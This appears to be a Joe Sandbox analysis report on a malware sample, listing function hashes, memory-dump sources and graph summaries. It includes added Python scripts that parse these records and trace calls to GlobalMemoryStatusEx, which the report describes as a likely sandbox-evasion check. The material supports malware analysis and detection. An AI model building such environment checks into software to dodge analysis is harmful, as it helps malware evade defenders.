                                              • Opcode ID: 5805f2710ec4a785d54d60f1231214644121b6362f6b4a7c39ffa56c7d5258cb
                                              • Instruction ID: a81ee4d1a23d703cd8cc34e4ce77ad15bc9f55935ac49256b8aa1e8609641bc7
                                              • Opcode Fuzzy Hash: 5805f2710ec4a785d54d60f1231214644121b6362f6b4a7c39ffa56c7d5258cb
                                              • Instruction Fuzzy Hash: 19210775504204DFDF04DF14D5C4B26BFA6FB85314F24C56DD94A4B656C33AD806CA72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: 30a6b6151d178361dac6ab922d6e78d8411c604b8b2ee5026ae4e93b93efec99
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: C0119D75504280DFDB06CF14D5C4B15FFB2FB85314F28C6A9D94A4B656C33AD84ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a054c77bed5a0dc53b6c9cd40e3c00932dcf018138479badaf1bd7de88a35b4
                                              • Instruction ID: f057bbe51df8409059fb5dc8129e19e2be92cb4a3fba06b4260d2e25b89dedd7
                                              • Opcode Fuzzy Hash: 2a054c77bed5a0dc53b6c9cd40e3c00932dcf018138479badaf1bd7de88a35b4
                                              • Instruction Fuzzy Hash: 001290B2501B468EE751DF66ED4C38B7BA2BB85318BA04709D2613B2F1DBB8114ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15a2ab2aa1995acb951b848dd4157ccf37e34e8284957f023714f053aaf02e31
                                              • Instruction ID: a5470573f135f2b8c750c31ce9ab5e39c9daabef3cf513c49d3f13e5c829b53d
                                              • Opcode Fuzzy Hash: 15a2ab2aa1995acb951b848dd4157ccf37e34e8284957f023714f053aaf02e31
                                              • Instruction Fuzzy Hash: D2E11D74E002198FCB14DFA9C580AAEFBF2FF89305F24915AE515AB359D730A942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7136efc5c0fc88541d99ad99d81536c2d73070faaabe28697fb682db8697bb0b
                                              • Instruction ID: 3178297a256b748be1e60f0e2aa5e79e43c6bdca6bde750bf43345923ebb524b
                                              • Opcode Fuzzy Hash: 7136efc5c0fc88541d99ad99d81536c2d73070faaabe28697fb682db8697bb0b
                                              • Instruction Fuzzy Hash: 1DE12E74E042198FCB14DFA9C580AAEFBF2FF89305F24816AE515AB355C731A941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37fcf1eb55a8fa011fa2f353e36bd27714388eb07f63c441f556f02f58730e44
                                              • Instruction ID: b92b83813824d376e13c11555f943eea1d309be498ea8731ce63e6285e6583f7
                                              • Opcode Fuzzy Hash: 37fcf1eb55a8fa011fa2f353e36bd27714388eb07f63c441f556f02f58730e44
                                              • Instruction Fuzzy Hash: D4E11C74E002198FCB14DFA8C580AAEFBF2FF89305F24915AE415AB399D770A941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 972d5a723dd54bb48191119e86e2165d729e133d66eddd6e70e2c40dd03e791f
                                              • Instruction ID: c87e3b92443fea372a2b150b156e2f17f30e58d5c2df6f4ae5f7a893f9741aad
                                              • Opcode Fuzzy Hash: 972d5a723dd54bb48191119e86e2165d729e133d66eddd6e70e2c40dd03e791f
                                              • Instruction Fuzzy Hash: 86E1FC74E002198FCB14DFA9C590AAEBBF2FF89305F249169E415AB399D730E941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c099ac276baedf9ef1d67979b1ca5522c9a74fd71052fca965e7a4d4d9ee839c
                                              • Instruction ID: 262aab3c36ad3487a9f6b82652ef97de9538873e88e683d123c06be9c491f318
                                              • Opcode Fuzzy Hash: c099ac276baedf9ef1d67979b1ca5522c9a74fd71052fca965e7a4d4d9ee839c
                                              • Instruction Fuzzy Hash: B9E1FB74E042198FCB14DFA9C580AAEBBB2FF89305F249159E415AB399D730E942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fad06584ef619a2441afd9295cb0ca660a0406bc94995aa4c9491f098479883
                                              • Instruction ID: 245843e2ab6742238ece091c64a0c6363b798b302db888adea0c492b63cb5b1c
                                              • Opcode Fuzzy Hash: 5fad06584ef619a2441afd9295cb0ca660a0406bc94995aa4c9491f098479883
                                              • Instruction Fuzzy Hash: F4D1E831D2075A8ACB11EF64D994A9DB7B5FF95300F10CB9AE0093B224EB706AC9CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bc4fd2f3a1f0a44d17c43db1e0d6e03ce0fdf96ba4c53d7a8e02dcda53e6acd
                                              • Instruction ID: 7867258acc090f753a4e4fe4ca521eb4fbc46801c5fa535c1d8aad0392dfbdd5
                                              • Opcode Fuzzy Hash: 7bc4fd2f3a1f0a44d17c43db1e0d6e03ce0fdf96ba4c53d7a8e02dcda53e6acd
                                              • Instruction Fuzzy Hash: 20A16031A00219CFCF09DFB5C9845DEB7B2FF84301B15956AE806AB2A5EBB1D955CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06f92f03b9419879d134b39d8fcfb541872359b7382d7d4e62c75fb2fe492616
                                              • Instruction ID: 69b5df121990fb92b6ecff28134206808bb6aab4f3351c3c4da5f2adc55e4e68
                                              • Opcode Fuzzy Hash: 06f92f03b9419879d134b39d8fcfb541872359b7382d7d4e62c75fb2fe492616
                                              • Instruction Fuzzy Hash: FFC1E4B2900B468ED711DF66EC4828BBBB2BB85328F654719D2617B2F1DBB4144ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63ecbb87bbb264c414fad0451cf44428f94d0067ded0af1fa3b671c6aa79b55d
                                              • Instruction ID: c56817dc4838a29ff5d6d434cbbd630eaccb525b096211caadaf22b9e27a789a
                                              • Opcode Fuzzy Hash: 63ecbb87bbb264c414fad0451cf44428f94d0067ded0af1fa3b671c6aa79b55d
                                              • Instruction Fuzzy Hash: 4851F974E042198BDB14DFA9C5806AEBBF2FF89305F24C16AD419AB356D730A942CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af5279990e196cd15faad9fc8a37a390f9f2d8ebe0e092d6480064612b329f87
                                              • Instruction ID: 6cc06aaa369be11262f82465bbc1ad1314b837428164379c9e0db5f52249ec03
                                              • Opcode Fuzzy Hash: af5279990e196cd15faad9fc8a37a390f9f2d8ebe0e092d6480064612b329f87
                                              • Instruction Fuzzy Hash: 5D511E74E042198BDB14CFA9C5816AEFBF2FF89305F24C16AD419AB355D7309942CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%
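
Every function in this listing follows the same fixed record layout (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, Uniqueness), which makes it straightforward to pull the fuzzy hashes, dump offsets and resolved imports out of the page for correlation with other samples. The Python below is an added example, not Joe Sandbox code: it parses that layout into one dict per function and offers a few aggregations over the result. SAMPLE is a constructed excerpt consisting of two records copied from this report with the page indentation removed; the field names are derived from the bullet labels, and the assumption that a "Uniqueness Score" line closes each record is inferred from the listing rather than documented.

```python
"""Parse the per-function records of a Joe Sandbox report into structured dicts.

Added example; this is not Joe Sandbox code. SAMPLE is a constructed excerpt:
two records copied from this report's listing, page indentation removed."""
import re
from collections import Counter

SAMPLE = r"""
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 05D0BB6D
Memory Dump Source
• Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 07b8f67dff76d7a12f4b781a2a50d22ca4eb43a73bead1c21c65f1096bd611b5
• Instruction ID: 50ec8d9db3b6318749e4f4199d366858fa308999238388fd5c240c89c6ae088c
• Opcode Fuzzy Hash: 07b8f67dff76d7a12f4b781a2a50d22ca4eb43a73bead1c21c65f1096bd611b5
• Instruction Fuzzy Hash: 391103B58007499FDB10DF9AD889BDEFBF8FB48720F10841AE518A7250D379A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: \V-j
• API String ID: 0-1172565933
• Opcode ID: 97dab16ad959721f6644a77ec2e474d646e7555f554e27f44dc705f9fb277844
• Instruction ID: 0d180b11333e79d70432f7991387ce01d1d5181b7ea2598997852223e26307fb
• Opcode Fuzzy Hash: 97dab16ad959721f6644a77ec2e474d646e7555f554e27f44dc705f9fb277844
• Instruction Fuzzy Hash: 12916B70E00209DFDB10DFA9D98579DBBF2BF88314F148129E408E7294EB74D985CB92
Uniqueness

Uniqueness Score: -1.00%
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR"  (one resolved import per line)
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[0-9.]+)%$")
GRAPH_PREFIXES = ("control_flow_graph", "execution_graph")


def parse_records(text):
    """Split the listing on 'Uniqueness Score' lines, one dict per function."""
    records, cur, section = [], {"apis": []}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith(GRAPH_PREFIXES):
            continue                      # blank lines and graph edge lists carry no fields
        if m := SCORE_RE.match(line):
            cur["uniqueness_score"] = float(m.group(1))
            records.append(cur)           # the score line closes a record
            cur, section = {"apis": []}, None
        elif not line.startswith("•"):
            section = line                # "APIs", "Memory Dump Source", "Similarity", ...
        elif section == "APIs":
            if m := API_RE.match(line):
                name, module, args, ref = m.groups()
                cur["apis"].append({"name": name, "module": module,
                                    "args": args.split(","), "ref": ref.upper()})
        elif m := SRC_RE.match(line):
            cur["source_file"], cur["offset"] = m.group(1), m.group(2).upper()
            cur["based_on_pe"] = m.group(3) == "true"
        elif m := KV_RE.match(line):
            # "Opcode Fuzzy Hash" -> opcode_fuzzy_hash, "API String ID" -> api_string_id, ...
            cur[m.group(1).strip().lower().replace(" ", "_")] = m.group(2).strip()
    return records


def api_usage(records):
    """Resolved imports across all records, as Name.MODULE -> number of call sites."""
    return Counter(f"{a['name']}.{a['module']}" for r in records for a in r["apis"])


def functions_per_dump(records):
    """How many function records came from each memory dump (.sdmp) file."""
    return Counter(r.get("source_file", "") for r in records)


def calls_with_arg(records, api_name, arg_index, value):
    """(dump offset, call-site address) for every call to api_name whose
    arg_index-th argument equals value, e.g. PostMessageW with uMsg 00000010 (WM_CLOSE)."""
    return [(r["offset"], a["ref"]) for r in records for a in r["apis"]
            if a["name"] == api_name and len(a["args"]) > arg_index
            and a["args"][arg_index] == value]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", dict(api_usage(recs)))
    print("WM_CLOSE posts:", calls_with_arg(recs, "PostMessageW", 1, "00000010"))
```

The second argument of the PostMessageW call in this listing, 00000010, is WM_CLOSE, so `calls_with_arg(recs, "PostMessageW", 1, "00000010")` returns the sites that close a window by posting that message. In every record on this page the Opcode ID and the Opcode Fuzzy Hash are identical, so deduplicating functions on either field gives the same result.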

                                              Execution Graph

                                               Execution Coverage: 11%
                                               Dynamic/Decrypted Code Coverage: 100%
                                               Signature Coverage: 0%
                                               Total number of Nodes: 25
                                               Total number of Limit Nodes: 6
                                               [Execution graph, given as an edge list in the original: 25 nodes rooted at 1870848, with a second code region at 680cf77-680d5ab. The only node label that resolves to an API is GlobalMemoryStatusEx, reached at 1871492, 1877098 and 680d5ab; every other node is an unresolved address.]
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84d684759b695d0ce6471b4a5bfcd6b91f07d8c3ab4d62f7f7f3f6f5796c56ee
                                              • Instruction ID: a18fb827496f004eee94d07520a3c4b876a02d62c2403ac0a9c6cf28a1ed9cd1
                                              • Opcode Fuzzy Hash: 84d684759b695d0ce6471b4a5bfcd6b91f07d8c3ab4d62f7f7f3f6f5796c56ee
                                              • Instruction Fuzzy Hash: 9953F931D10B1A8ADB11EF68C8945A9F7B1FF99300F15D79AE058B7121FB70AAD4CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%
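
The execution_graph data above is an edge list: each node is written as "<id> <address>", followed by an API name when the address resolved to an import, and each edge as "<id>-><id>". The only import in this graph is GlobalMemoryStatusEx, which reports the amount of physical memory and is a common input to sandbox-sizing checks. The Python below is an added example, not Joe Sandbox code; EDGE_LIST is copied from this report's execution_graph line, and the token layout is inferred from that text rather than taken from any documented format. It rebuilds the graph and reports, for each API node, the shortest address path from the root node 1870848.

```python
"""Parse a Joe Sandbox execution_graph edge list and find which nodes resolve to an API.

Added example; not Joe Sandbox code. EDGE_LIST is copied from this report's
execution_graph line. The token layout assumed here ("<id> <addr> [<api>]" for a
node, "<id>-><id>" for an edge) is inferred from that text, not documented."""
from collections import deque

EDGE_LIST = (
    "execution_graph 25593 1870848 25595 1870849 25593->25595 25594 187091b 25595->25594 "
    "25598 1871382 25595->25598 25604 1871492 25595->25604 25600 187138b 25598->25600 "
    "25601 1871316 25598->25601 25599 1871488 25599->25595 25600->25599 "
    "25602 1871492 GlobalMemoryStatusEx 25600->25602 25610 1877098 25600->25610 25601->25595 "
    "25602->25600 25605 1871497 25604->25605 25606 1871396 25604->25606 25605->25595 "
    "25607 1871488 25606->25607 25608 1871492 GlobalMemoryStatusEx 25606->25608 "
    "25609 1877098 GlobalMemoryStatusEx 25606->25609 25607->25595 25608->25606 25609->25606 "
    "25611 18770a2 25610->25611 25612 18770bc 25611->25612 25615 680cf77 25611->25615 "
    "25619 680cf88 25611->25619 25612->25600 25616 680cf88 25615->25616 25617 680d1ae "
    "25616->25617 25618 680d5ab GlobalMemoryStatusEx 25616->25618 25617->25612 25618->25616 "
    "25620 680cf9d 25619->25620 25621 680d1ae 25620->25621 25622 680d5ab GlobalMemoryStatusEx "
    "25620->25622 25621->25612 25622->25620"
)


def parse_execution_graph(text):
    """Return ({node_id: (addr, api_or_None)}, {src_id: [dst_id, ...]})."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges, i = {}, {}, 0
    while i < len(tokens):
        if "->" in tokens[i]:
            src, dst = tokens[i].split("->", 1)
            edges.setdefault(src, []).append(dst)
            i += 1
            continue
        node_id, addr, api = tokens[i], tokens[i + 1], None
        # A third token that is neither a numeric node id nor an edge is the API name.
        if i + 2 < len(tokens) and not tokens[i + 2].isdigit() and "->" not in tokens[i + 2]:
            api, i = tokens[i + 2], i + 1
        nodes[node_id] = (addr, api)
        i += 2
    return nodes, edges


def api_nodes(nodes):
    """Node ids whose label resolved to an imported API."""
    return {nid: na for nid, na in nodes.items() if na[1]}


def shortest_path(nodes, edges, src, dst):
    """BFS from src to dst over node ids; returns the address sequence, or None."""
    prev, queue = {src: None}, deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path = []
            while cur is not None:
                path.append(nodes[cur][0])
                cur = prev[cur]
            return path[::-1]
        for nxt in edges.get(cur, []):
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None


def api_reachability(text, root):
    """For each API node: (addr, api, shortest address path from root or None)."""
    nodes, edges = parse_execution_graph(text)
    return {nid: (addr, api, shortest_path(nodes, edges, root, nid))
            for nid, (addr, api) in sorted(api_nodes(nodes).items())}


if __name__ == "__main__":
    for nid, (addr, api, path) in api_reachability(EDGE_LIST, "25593").items():
        print(f"{api} @ {addr} (node {nid}): {' -> '.join(path) if path else 'unreachable'}")
```

Five of the 25 nodes carry the GlobalMemoryStatusEx label, at three distinct addresses; the root reaches the first of them in four hops (1870848, 1870849, 1871382, 187138b, 1871492), which is the kind of short distance from entry that is typical of an environment check run before the main payload.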

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54e520c1dd4f36a600b1d9c40762e9ed051b0b3c77fef0bbe12b957a1e066a17
                                              • Instruction ID: 6d90691a286ae06f685a2809df00701639f5a68245fb55a92adbf05e2945be53
                                              • Opcode Fuzzy Hash: 54e520c1dd4f36a600b1d9c40762e9ed051b0b3c77fef0bbe12b957a1e066a17
                                              • Instruction Fuzzy Hash: 25331E31D1061A8EDB11EF68C8906ADF7B1FF99300F15C79AE459A7221EB70EAC5CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j
                                              • API String ID: 0-1172565933
                                              • Opcode ID: 97dab16ad959721f6644a77ec2e474d646e7555f554e27f44dc705f9fb277844
                                              • Instruction ID: 0d180b11333e79d70432f7991387ce01d1d5181b7ea2598997852223e26307fb
                                              • Opcode Fuzzy Hash: 97dab16ad959721f6644a77ec2e474d646e7555f554e27f44dc705f9fb277844
                                              • Instruction Fuzzy Hash: 12916B70E00209DFDB10DFA9D98579DBBF2BF88314F148129E408E7294EB74D985CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eef378ab8a52e30ca8657fd5c2645748c71f9be047ca4679020e8bf95a0ee297
                                              • Instruction ID: 6ed293b2ec4dd0011ff0797e367626ad42240afee5e995ba1db58b143a6e9df3
                                              • Opcode Fuzzy Hash: eef378ab8a52e30ca8657fd5c2645748c71f9be047ca4679020e8bf95a0ee297
                                              • Instruction Fuzzy Hash: 5FB13A70E00209CFDB14CFA9D9857ADBFF2AF88318F148529D459E7294EB74D985CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                               Control-flow Graph

                                               [Control-flow graph, given as a block list in the original: basic blocks from 1874818 through 1874a64. Two call sites into 1870ab8 (blocks 1874a1f-1874a22 and 1874a33-1874a36), tight loops at 18748cf-18748de and 1874935-1874944, and a terminal block at 1874a64 that branches to itself. The executed/not-executed colouring of the rendered graph is not preserved in the text.]
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j$\V-j
                                              • API String ID: 0-3066401176
                                              • Opcode ID: 30ed64713f34d8ad50edbad237778047513133567dbee447618479af8f1baf8a
                                              • Instruction ID: 9a7f0c3f3ccd8ff0134eebb06d8650c26dcfc91d8dd36e83f59d2d7f5621a929
                                              • Opcode Fuzzy Hash: 30ed64713f34d8ad50edbad237778047513133567dbee447618479af8f1baf8a
                                              • Instruction Fuzzy Hash: 2B714B70E00249DFDB14DFADC8847AEFBF2AF88314F148129E419E7294EB749946CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: basic blocks 187480c-1874a64 (calls 1870ab8)
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j$\V-j
                                              • API String ID: 0-3066401176
                                              • Opcode ID: 5fbddd3162662879d207779629108ec3744483e4b0a8e6a4f7cdf004d232bbe3
                                              • Instruction ID: f8b6cdabf3091ce6cd1a575714d22cc24e03976c4cf04f383894b5523c5ae406
                                              • Opcode Fuzzy Hash: 5fbddd3162662879d207779629108ec3744483e4b0a8e6a4f7cdf004d232bbe3
                                              • Instruction Fuzzy Hash: 657159B0E00249DFDB10DFADC8847AEFBF2AF88314F148129E419E7294DB749942CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: basic blocks 680e188-680e315 (calls 680d57c, 680d588, GlobalMemoryStatusEx)
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3266683636.0000000006800000.00000040.00000800.00020000.00000000.sdmp, Offset: 06800000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_6800000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e2ea89bcf246d336ceb0a38c5f5d8d9f5eb31e33cc915904b7e1fae50ea21534
                                              • Instruction ID: 097fcbb70ac3935edcd67b684c285b03942b961e5c38a7cdbf3edafc8ef198d4
                                              • Opcode Fuzzy Hash: e2ea89bcf246d336ceb0a38c5f5d8d9f5eb31e33cc915904b7e1fae50ea21534
                                              • Instruction Fuzzy Hash: 1E412771D083969FC715CFB9D8046AEBFB1AF89210F1489ABE408E7281D7389985CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: basic blocks 680e270-680e315 (calls GlobalMemoryStatusEx)
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0680E2D7
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3266683636.0000000006800000.00000040.00000800.00020000.00000000.sdmp, Offset: 06800000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_6800000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: a720996682293bb7908393084a946bee00df36c97705c0f69517e4ae34efaeef
                                              • Instruction ID: 74c0aaf628c36b2d7d583319d617bf05bfed2360164c19c816dceb9bb3cdc27a
                                              • Opcode Fuzzy Hash: a720996682293bb7908393084a946bee00df36c97705c0f69517e4ae34efaeef
                                              • Instruction Fuzzy Hash: 121114B1C006599BCB10DF9AC448ADEFBF4AF48310F10852AE518A7240D378A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V-j
                                              • API String ID: 0-1172565933
                                              • Opcode ID: 82f11a214fe3186841c1e4b8db83ca35c7c9f61b6f1493276ea8c5faacd4103d
                                              • Instruction ID: b695a15a65453fc0c37a8c6ee7cbac250b70b0fe1625f8bcb997b371967cfd04
                                              • Opcode Fuzzy Hash: 82f11a214fe3186841c1e4b8db83ca35c7c9f61b6f1493276ea8c5faacd4103d
                                              • Instruction Fuzzy Hash: 8F917A70E00209DFDB11DFA9D98579DBBF2BF88314F148129E818E7294EB74D985CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 75fb21e3f92e47ca36ff33bbc2df3f659120afb26363c98ff4ae98e898e0d3cc
                                              • Instruction ID: 0c22908b49038826268706050ad920121232c2cc0b52ffd6c18efa286f3671b6
                                              • Opcode Fuzzy Hash: 75fb21e3f92e47ca36ff33bbc2df3f659120afb26363c98ff4ae98e898e0d3cc
                                              • Instruction Fuzzy Hash: F241EE307002068FDB19AB38D5A466E7BE7EF89310F248478E106DB395DE39DE46CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
